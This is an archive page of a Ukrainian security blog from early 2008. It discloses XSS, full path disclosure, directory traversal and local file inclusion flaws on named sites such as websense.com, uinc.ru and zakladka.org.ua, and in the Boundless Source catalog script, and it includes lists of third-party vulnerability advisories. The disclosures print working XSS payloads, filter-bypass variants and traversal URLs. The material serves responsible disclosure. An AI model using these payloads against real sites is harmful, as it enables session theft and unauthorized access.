Архів для категорії 'Уразливості'

Уразливості на websense.com

23:56 02.02.2008

Ще у листопаді, 12.11.2006, я знайшов Cross-Site Scripting, Full path disclosure, Directory Traversal та Local File Inclusion уразливості на http://websense.com - сайті секюріті компанії Websense (зокрема в пошуці по сайту http://search.websense.com). Спочатку я знайшов XSS та Full path disclosure дірки, і поки черга дійшла до публікації дір на даному сайті (що трохи відклалось), вияснилося, що вони вже виправили XSS :-) . Тому я знайшов ще нові Directory Traversal та Local File Inclusion дірки, і відклав на деякий час їх публікацію (що знову відтермінувало цей процес).

І от в минулому місяці я дістався вже до ціх дірок на сайті Websense, але вияснилось, що вони повністю відмовилися від свого попереднього пошукового движка і створили новий (більш простий, але й без дір). Тому опублікую зараз вже неактуальні уразливості (котрі вірогідно так і не були повністю виправлені адмінами сайта, вони просто змінили локальний пошуковець). Саме цікаве в даних уразливостях - це знайдена мною Cross-Site Scripting уразливість, за ради якої варто опублікувати дану інформацію.

Знайдена мною 12.11.2006 XSS уразливість на даному сайті - це новий тип XSS уразливостей, котрий я назвав Remote HTML Include та Remote XSS Include. Про даний тип уразливостей я згадав під час MOSEB в записі Vulnerabilities at images.google.com. В 2007 році з’явилися й публікації інших дослідників про подібні уразливості, але я виявив її першим ще в листопаді 2006, тому являюся першовідкривачем даного типу XSS уразливостей 8-) .

XSS: Remote HTML Include / Remote XSS Include:

http://search.websense.com/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest

Full path disclosure:

http://search.websense.com/highlight/index.html?url=http%3A//www.websense.com/internet-filtering/index.php&fterm=test%3C&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest%3C

Directory Traversal:

http://search.websense.com/help/syntax.html?la=/../index

Local File Inclusion:

http://search.websense.com/help/syntax.html?la=/../query

Добірка уразливостей

16:41 02.02.2008

В даній добірці уразливості в веб додатках:

  • SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
  • SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
  • Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0 (деталі)
  • phpTrafficA Local File Inclusion (деталі)
  • FlashGameScript v1.5.4 Remote File Inclusion Vulnerability (деталі)
  • arabhost Remote Incluude File (деталі)
  • JBrowser acces to admin/config files (деталі)
  • Уразливість при обробці даних в WinFtp Server (деталі)
  • Directory traversal vulnerability in GeoIP 1.4.0 (деталі)
  • Переповнення буферу в Sambar FTP Server (деталі)
  • Sun Java security update (деталі)
  • Декілька уразливостей в PHP-Update (деталі)
  • SQL-ін’єкція в Burak Yilmaz Download Portal (деталі)
  • Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine) (деталі)
  • SQL injection vulnerability in Motionborg Web Real Estate (деталі)

Уразливості на www.uinc.ru

19:27 01.02.2008

29.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливості на секюріті проекті http://www.uinc.ru (Underground InformatioN Center). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

01.02.2008

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php:

"><script>alert(document.cookie)</script>В полях: Тема, Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені, але неякісно. При невеликій модифікації коду три з чотирьох XSS знову працюють.

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php (IE):

" style="xss:expression(alert(document.cookie))В полях: Тема, Ваше имя, Ваш E-mail.

Добірка уразливостей

16:35 31.01.2008

В даній добірці уразливості в веб додатках:

  • BlueCat Networks Adonis root Privilege Access (деталі)
  • SquirrelMail G/PGP Plugin gpg_help.php Local File Inclusion Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin gpg_check_sign_pgp_mime() Command Injection Vulnerability (деталі)
  • pheap [edit LFI] vulnerability (деталі)
  • LoveCMS 1.4 multiple vulnerabilities (деталі)
  • Plantilla PHP Simple (деталі)
  • Pics Navigator Directory Traversal Vulnerability (деталі)
  • Дві уразливості в HyperACCESS (деталі)
  • FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) (деталі)
  • Cross-site request forgery (CSRF) vulnerability in SPINE (деталі)
  • Численні уразливості в Sun Java JRE (деталі)
  • Vulnerability in M-Core (деталі)
  • Міжсайтовий скриптінг в Drupal MySite Module (деталі)
  • Sun Java System Content Delivery Server May Allow Unauthorized Viewing of Content Details (деталі)
  • PHP-інклюдинг в CuteNews AJ-Fork (деталі)

Уразливості в плагінах для WordPress №6

23:54 30.01.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах fGallery, WP-Cal та Adserve. Для котрих нещодавно з’явилися експлоіти. fGallery - це плагін для створення галереї зображень, WP-Cal - це плагін для створення календаря, а Adserve - це плагін для керування рекламою на сайті.

  • Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability (деталі)
  • Wordpress Plugin WP-Cal 0.3 editevent.php SQL Injection Vulnerability (деталі)
  • Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на zakladka.org.ua

19:41 30.01.2008

26.02.2007

Ще в вересні, 29.09.2006 (трохи відклалося з цим анонсом), я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://zakladka.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.01.2008

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html

<script>alert(document.cookie)<script>В полі: Подай URL сторінки.

Full path disclosure:

Такий самий POST запит на сторінці http://zakladka.org.ua/add.html.

Дані уразливості вже виправлені. Але XSS дірка виправлена не повністю і при невеликій модифікації знову працює.

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html (для IE)

" style="xss:expression(alert(document.cookie))В полі: Подай URL сторінки.

Добірка уразливостей

16:23 29.01.2008

В даній добірці уразливості в веб додатках:

  • Vulnerability in getID3 in the Mediafield and Audio modules for Drupal (деталі)
  • Vulnerability in the Secure site module for Drupal (деталі)
  • Firebird process_packet() Remote Stack Overflow Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability (деталі)
  • SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability (деталі)
  • SendStudio <= 2004.14 Remote File Inclusion Vulnerability (деталі)
  • SaphpLesson v3.0 SQL Injection Exploit (деталі)
  • Уразливість при обробці RETR кодманд в Star FTP Server (деталі)
  • Vulnerability in CarbonCommunities (деталі)
  • PHP-інклюдинг в MxBB Portal mx_charts (деталі)
  • Уразливість при обробці вхідних даних в SQL-Ledger (деталі)
  • Directory traversal vulnerability in VerliAdmin (деталі)
  • New elog packages fix arbitrary code execution (деталі)
  • Декілька уразливостей в ScriptMate User Manager (деталі)
  • mono-web ASP.net sourcecode disclosure (деталі)

Уразливості на www.opennet.ru

19:16 28.01.2008

03.09.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті www.opennet.ru (який в тому числі публікує новини безпеки). А сьогодні я знайшов ще дві XSS уразливості. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2008

XSS:

Дані уразливості вже виправлені. До речі, в листопаді я писав про уразливість в капчі - opennet.ru CAPTCHA bypass.

Добірка уразливостей

16:33 27.01.2008

В даній добірці уразливості в веб додатках:

  • SQL injection vulnerability in webSPELL 4.01.02 (деталі)
  • Directory traversal flaw in shttp (деталі)
  • AdMentor Script Remote SQL injection Exploit (деталі)
  • phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities (деталі)
  • SQL injection vulnerability in Francisco Burzi PHP-Nuke 8.0 (деталі)
  • Vulnerability in phpMyFAQ (деталі)
  • Cross-site scripting vulnerability in the Barry Jaspan Image Pager module for Drupal (деталі)
  • Vulnerability in newsCMSlite (деталі)
  • SQL injection vulnerability in E-SMARTCART 1.0 (деталі)
  • Розкриття ідентифікаторів сесій користувачів в Drupal Chatroom (деталі)
  • Переповнення буфера в ProFTPD (деталі)
  • SQL injection vulnerability in Simple Web Content Management System (деталі)
  • Уразливість при обробці команди LIST в Crob FTP Server (деталі)
  • Vulnerability in Sven Moderow GuestBook 0.3a (деталі)
  • Обхід механізму захисту від XSS в Adobe ColdFusion MX (деталі)

Cross-Site Scripting уразливості в Boundless Source

23:52 26.01.2008

У листопаді, 29.11.2007, я знайшов Cross-Site Scripting уразливості у веб додатку Boundless Source (скрипт каталогу).

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

POST запит на сторінці http://site/catalog/add-lnk.cgi?cmd=showform

<BODY onload=alert(document.cookie)В полях: Название ресурса, URL, Регион, Описание сайта.

Вразливі версії Boundless Source 1.2.1 (безкоштовна) і 2.4 (комерційна) та попередні версії. Про уразливості розробникам веб додатка я повідомлю найближчим часом.